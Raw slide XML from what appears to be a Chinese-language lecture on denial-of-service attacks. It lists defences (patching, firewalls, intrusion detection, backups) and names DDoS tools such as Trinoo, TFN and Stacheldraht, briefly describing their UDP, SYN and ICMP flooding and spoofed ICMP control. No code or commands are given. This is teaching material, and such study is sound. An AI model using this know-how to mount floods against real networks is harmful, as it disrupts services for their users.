                  <a:gd name="T38" fmla="*/ 0 w 1371"/>
                  <a:gd name="T39" fmla="*/ 0 h 741"/>
                  <a:gd name="T40" fmla="*/ 0 w 1371"/>
                  <a:gd name="T41" fmla="*/ 0 h 741"/>
                  <a:gd name="T42" fmla="*/ 0 w 1371"/>
                  <a:gd name="T43" fmla="*/ 0 h 741"/>
                  <a:gd name="T44" fmla="*/ 0 w 1371"/>
                  <a:gd name="T45" fmla="*/ 0 h 741"/>
                  <a:gd name="T46" fmla="*/ 0 w 1371"/>
                  <a:gd name="T47" fmla="*/ 0 h 741"/>
                  <a:gd name="T48" fmla="*/ 0 w 1371"/>
                  <a:gd name="T49" fmla="*/ 0 h 741"/>
                  <a:gd name="T50" fmla="*/ 0 w 1371"/>
                  <a:gd name="T51" fmla="*/ 0 h 741"/>
                  <a:gd name="T52" fmla="*/ 0 w 1371"/>
                  <a:gd name="T53" fmla="*/ 0 h 741"/>
                  <a:gd name="T54" fmla="*/ 0 w 1371"/>
                  <a:gd name="T55" fmla="*/ 0 h 741"/>
                  <a:gd name="T56" fmla="*/ 0 w 1371"/>
                  <a:gd name="T57" fmla="*/ 0 h 741"/>
                  <a:gd name="T58" fmla="*/ 0 w 1371"/>
                  <a:gd name="T59" fmla="*/ 0 h 741"/>
                  <a:gd name="T60" fmla="*/ 0 w 1371"/>
                  <a:gd name="T61" fmla="*/ 0 h 741"/>
                  <a:gd name="T62" fmla="*/ 0 w 1371"/>
                  <a:gd name="T63" fmla="*/ 0 h 741"/>
                  <a:gd name="T64" fmla="*/ 0 w 1371"/>
                  <a:gd name="T65" fmla="*/ 0 h 741"/>
                  <a:gd name="T66" fmla="*/ 0 w 1371"/>
                  <a:gd name="T67" fmla="*/ 0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3" name="Freeform 86"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="876" y="3422"/>
                <a:ext cx="366" cy="75"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1099"/>
                  <a:gd name="T1" fmla="*/ 0 h 225"/>
                  <a:gd name="T2" fmla="*/ 0 w 1099"/>
                  <a:gd name="T3" fmla="*/ 0 h 225"/>
                  <a:gd name="T4" fmla="*/ 0 w 1099"/>
                  <a:gd name="T5" fmla="*/ 0 h 225"/>
                  <a:gd name="T6" fmla="*/ 0 w 1099"/>
                  <a:gd name="T7" fmla="*/ 0 h 225"/>
                  <a:gd name="T8" fmla="*/ 0 w 1099"/>
                  <a:gd name="T9" fmla="*/ 0 h 225"/>
                  <a:gd name="T10" fmla="*/ 0 w 1099"/>
                  <a:gd name="T11" fmla="*/ 0 h 225"/>
                  <a:gd name="T12" fmla="*/ 0 w 1099"/>
                  <a:gd name="T13" fmla="*/ 0 h 225"/>
                  <a:gd name="T14" fmla="*/ 0 w 1099"/>
                  <a:gd name="T15" fmla="*/ 0 h 225"/>
                  <a:gd name="T16" fmla="*/ 0 w 1099"/>
                  <a:gd name="T17" fmla="*/ 0 h 225"/>
                  <a:gd name="T18" fmla="*/ 0 w 1099"/>
                  <a:gd name="T19" fmla="*/ 0 h 225"/>
                  <a:gd name="T20" fmla="*/ 0 w 1099"/>
                  <a:gd name="T21" fmla="*/ 0 h 225"/>
                  <a:gd name="T22" fmla="*/ 0 w 1099"/>
                  <a:gd name="T23" fmla="*/ 0 h 225"/>
                  <a:gd name="T24" fmla="*/ 0 w 1099"/>
                  <a:gd name="T25" fmla="*/ 0 h 225"/>
                  <a:gd name="T26" fmla="*/ 0 w 1099"/>
                  <a:gd name="T27" fmla="*/ 0 h 225"/>
                  <a:gd name="T28" fmla="*/ 0 w 1099"/>
                  <a:gd name="T29" fmla="*/ 0 h 225"/>
                  <a:gd name="T30" fmla="*/ 0 w 1099"/>
                  <a:gd name="T31" fmla="*/ 0 h 225"/>
                  <a:gd name="T32" fmla="*/ 0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4" name="Freeform 87"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="693" y="2847"/>
                <a:ext cx="977" cy="406"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2930"/>
                  <a:gd name="T1" fmla="*/ 0 h 1217"/>
                  <a:gd name="T2" fmla="*/ 0 w 2930"/>
                  <a:gd name="T3" fmla="*/ 0 h 1217"/>
                  <a:gd name="T4" fmla="*/ 0 w 2930"/>
                  <a:gd name="T5" fmla="*/ 0 h 1217"/>
                  <a:gd name="T6" fmla="*/ 0 w 2930"/>
                  <a:gd name="T7" fmla="*/ 0 h 1217"/>
                  <a:gd name="T8" fmla="*/ 0 w 2930"/>
                  <a:gd name="T9" fmla="*/ 0 h 1217"/>
                  <a:gd name="T10" fmla="*/ 0 w 2930"/>
                  <a:gd name="T11" fmla="*/ 0 h 1217"/>
                  <a:gd name="T12" fmla="*/ 0 w 2930"/>
                  <a:gd name="T13" fmla="*/ 0 h 1217"/>
                  <a:gd name="T14" fmla="*/ 0 w 2930"/>
                  <a:gd name="T15" fmla="*/ 0 h 1217"/>
                  <a:gd name="T16" fmla="*/ 0 w 2930"/>
                  <a:gd name="T17" fmla="*/ 0 h 1217"/>
                  <a:gd name="T18" fmla="*/ 0 w 2930"/>
                  <a:gd name="T19" fmla="*/ 0 h 1217"/>
                  <a:gd name="T20" fmla="*/ 0 w 2930"/>
                  <a:gd name="T21" fmla="*/ 0 h 1217"/>
                  <a:gd name="T22" fmla="*/ 0 w 2930"/>
                  <a:gd name="T23" fmla="*/ 0 h 1217"/>
                  <a:gd name="T24" fmla="*/ 0 w 2930"/>
                  <a:gd name="T25" fmla="*/ 0 h 1217"/>
                  <a:gd name="T26" fmla="*/ 0 w 2930"/>
                  <a:gd name="T27" fmla="*/ 0 h 1217"/>
                  <a:gd name="T28" fmla="*/ 0 w 2930"/>
                  <a:gd name="T29" fmla="*/ 0 h 1217"/>
                  <a:gd name="T30" fmla="*/ 0 w 2930"/>
                  <a:gd name="T31" fmla="*/ 0 h 1217"/>
                  <a:gd name="T32" fmla="*/ 0 w 2930"/>
                  <a:gd name="T33" fmla="*/ 0 h 1217"/>
                  <a:gd name="T34" fmla="*/ 0 w 2930"/>
                  <a:gd name="T35" fmla="*/ 0 h 1217"/>
                  <a:gd name="T36" fmla="*/ 0 w 2930"/>
                  <a:gd name="T37" fmla="*/ 0 h 1217"/>
                  <a:gd name="T38" fmla="*/ 0 w 2930"/>
                  <a:gd name="T39" fmla="*/ 0 h 1217"/>
                  <a:gd name="T40" fmla="*/ 0 w 2930"/>
                  <a:gd name="T41" fmla="*/ 0 h 1217"/>
                  <a:gd name="T42" fmla="*/ 0 w 2930"/>
                  <a:gd name="T43" fmla="*/ 0 h 1217"/>
                  <a:gd name="T44" fmla="*/ 0 w 2930"/>
                  <a:gd name="T45" fmla="*/ 0 h 1217"/>
                  <a:gd name="T46" fmla="*/ 0 w 2930"/>
                  <a:gd name="T47" fmla="*/ 0 h 1217"/>
                  <a:gd name="T48" fmla="*/ 0 w 2930"/>
                  <a:gd name="T49" fmla="*/ 0 h 1217"/>
                  <a:gd name="T50" fmla="*/ 0 w 2930"/>
                  <a:gd name="T51" fmla="*/ 0 h 1217"/>
                  <a:gd name="T52" fmla="*/ 0 w 2930"/>
                  <a:gd name="T53" fmla="*/ 0 h 1217"/>
                  <a:gd name="T54" fmla="*/ 0 w 2930"/>
                  <a:gd name="T55" fmla="*/ 0 h 1217"/>
                  <a:gd name="T56" fmla="*/ 0 w 2930"/>
                  <a:gd name="T57" fmla="*/ 0 h 1217"/>
                  <a:gd name="T58" fmla="*/ 0 w 2930"/>
                  <a:gd name="T59" fmla="*/ 0 h 1217"/>
                  <a:gd name="T60" fmla="*/ 0 w 2930"/>
                  <a:gd name="T61" fmla="*/ 0 h 1217"/>
                  <a:gd name="T62" fmla="*/ 0 w 2930"/>
                  <a:gd name="T63" fmla="*/ 0 h 1217"/>
                  <a:gd name="T64" fmla="*/ 0 w 2930"/>
                  <a:gd name="T65" fmla="*/ 0 h 1217"/>
                  <a:gd name="T66" fmla="*/ 0 w 2930"/>
                  <a:gd name="T67" fmla="*/ 0 h 1217"/>
                  <a:gd name="T68" fmla="*/ 0 w 2930"/>
                  <a:gd name="T69" fmla="*/ 0 h 1217"/>
                  <a:gd name="T70" fmla="*/ 0 w 2930"/>
                  <a:gd name="T71" fmla="*/ 0 h 1217"/>
                  <a:gd name="T72" fmla="*/ 0 w 2930"/>
                  <a:gd name="T73" fmla="*/ 0 h 1217"/>
                  <a:gd name="T74" fmla="*/ 0 w 2930"/>
                  <a:gd name="T75" fmla="*/ 0 h 1217"/>
                  <a:gd name="T76" fmla="*/ 0 w 2930"/>
                  <a:gd name="T77" fmla="*/ 0 h 1217"/>
                  <a:gd name="T78" fmla="*/ 0 w 2930"/>
                  <a:gd name="T79" fmla="*/ 0 h 1217"/>
                  <a:gd name="T80" fmla="*/ 0 w 2930"/>
                  <a:gd name="T81" fmla="*/ 0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5" name="Freeform 88"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="607" y="2835"/>
                <a:ext cx="162" cy="115"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 486"/>
                  <a:gd name="T1" fmla="*/ 0 h 344"/>
                  <a:gd name="T2" fmla="*/ 0 w 486"/>
                  <a:gd name="T3" fmla="*/ 0 h 344"/>
                  <a:gd name="T4" fmla="*/ 0 w 486"/>
                  <a:gd name="T5" fmla="*/ 0 h 344"/>
                  <a:gd name="T6" fmla="*/ 0 w 486"/>
                  <a:gd name="T7" fmla="*/ 0 h 344"/>
                  <a:gd name="T8" fmla="*/ 0 w 486"/>
                  <a:gd name="T9" fmla="*/ 0 h 344"/>
                  <a:gd name="T10" fmla="*/ 0 w 486"/>
                  <a:gd name="T11" fmla="*/ 0 h 344"/>
                  <a:gd name="T12" fmla="*/ 0 w 486"/>
                  <a:gd name="T13" fmla="*/ 0 h 344"/>
                  <a:gd name="T14" fmla="*/ 0 w 486"/>
                  <a:gd name="T15" fmla="*/ 0 h 344"/>
                  <a:gd name="T16" fmla="*/ 0 w 486"/>
                  <a:gd name="T17" fmla="*/ 0 h 344"/>
                  <a:gd name="T18" fmla="*/ 0 w 486"/>
                  <a:gd name="T19" fmla="*/ 0 h 344"/>
                  <a:gd name="T20" fmla="*/ 0 w 486"/>
                  <a:gd name="T21" fmla="*/ 0 h 344"/>
                  <a:gd name="T22" fmla="*/ 0 w 486"/>
                  <a:gd name="T23" fmla="*/ 0 h 344"/>
                  <a:gd name="T24" fmla="*/ 0 w 486"/>
                  <a:gd name="T25" fmla="*/ 0 h 344"/>
                  <a:gd name="T26" fmla="*/ 0 w 486"/>
                  <a:gd name="T27" fmla="*/ 0 h 344"/>
                  <a:gd name="T28" fmla="*/ 0 w 486"/>
                  <a:gd name="T29" fmla="*/ 0 h 344"/>
                  <a:gd name="T30" fmla="*/ 0 w 486"/>
                  <a:gd name="T31" fmla="*/ 0 h 344"/>
                  <a:gd name="T32" fmla="*/ 0 w 486"/>
                  <a:gd name="T33" fmla="*/ 0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76" name="Freeform 89"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="642" y="2878"/>
                <a:ext cx="58" cy="42"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 173"/>
                  <a:gd name="T1" fmla="*/ 0 h 125"/>
                  <a:gd name="T2" fmla="*/ 0 w 173"/>
                  <a:gd name="T3" fmla="*/ 0 h 125"/>
                  <a:gd name="T4" fmla="*/ 0 w 173"/>
                  <a:gd name="T5" fmla="*/ 0 h 125"/>
                  <a:gd name="T6" fmla="*/ 0 w 173"/>
                  <a:gd name="T7" fmla="*/ 0 h 125"/>
                  <a:gd name="T8" fmla="*/ 0 w 173"/>
                  <a:gd name="T9" fmla="*/ 0 h 125"/>
                  <a:gd name="T10" fmla="*/ 0 w 173"/>
                  <a:gd name="T11" fmla="*/ 0 h 125"/>
                  <a:gd name="T12" fmla="*/ 0 w 173"/>
                  <a:gd name="T13" fmla="*/ 0 h 125"/>
                  <a:gd name="T14" fmla="*/ 0 w 173"/>
                  <a:gd name="T15" fmla="*/ 0 h 125"/>
                  <a:gd name="T16" fmla="*/ 0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7912" name="Picture 102" descr="skullt"/>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3563888" y="34758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bwMode="auto">
          <a:xfrm>
            <a:off x="7152565" y="2708274"/>
            <a:ext cx="1439861" cy="3165989"/>
            <a:chOff x="8846840" y="4075906"/>
            <a:chExt cx="1440160" cy="3165437"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37900" name="PPBand282"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8846840" y="6853545"/>
              <a:ext cx="144016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lnSpc>
                  <a:spcPct val="80000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="de-DE" sz="2400" b="1" dirty="0"/>
                <a:t>目标系统</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="de-DE" sz="2400" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="37901" name="Picture 118" descr="DESKC0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44000" y="4075906"/>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87170"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="387170"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="387170"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3871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 presetClass="exit" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>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7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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>对于网络</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>路由器和防火墙配置得当，可以减少受</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击的危险</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>入侵检测系统，检测异常行为</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>对于系统</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>升级系统内核，打上必要的补丁，特别是一些简单的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击，例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>land</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>teardrop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>smurf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>关掉不必要的服务和网络组件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>如果有配额功能的话，正确地设置这些配额</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>监视系统的运行，避免降低到基线以下</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>检测系统配置信息的变化情况</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>保证物理安全</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>建立备份和恢复机制</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="290818" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>防止</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4276725" y="6408738"/>
            <a:ext cx="511175" cy="449262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3E522E10-2696-4A1F-B96A-4DC3F5ACAB7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dirty="0" smtClean="0"/>
              <a:t>最常使用攻击程序：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Trinoo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>TFN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>TFN2K</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Stacheldraht</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7170" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击常用方式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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smtClean="0"/>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>包进行攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>随机指向目标端的各个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>端口，产生大量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>不可到达报文，严重增加目标主机负担并占用带宽，使对目标主机的正常访问无法进行。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7170" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Trinoo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Tribe Flood Network</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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zh-CN" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>TFN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8195" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>给主控端或分布端下命令，其来源可以做假</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0">
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>可发动</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>SYN flood </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>UDP flood </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>ICMP flood</a:t>
            </a:r>
            <a:r>
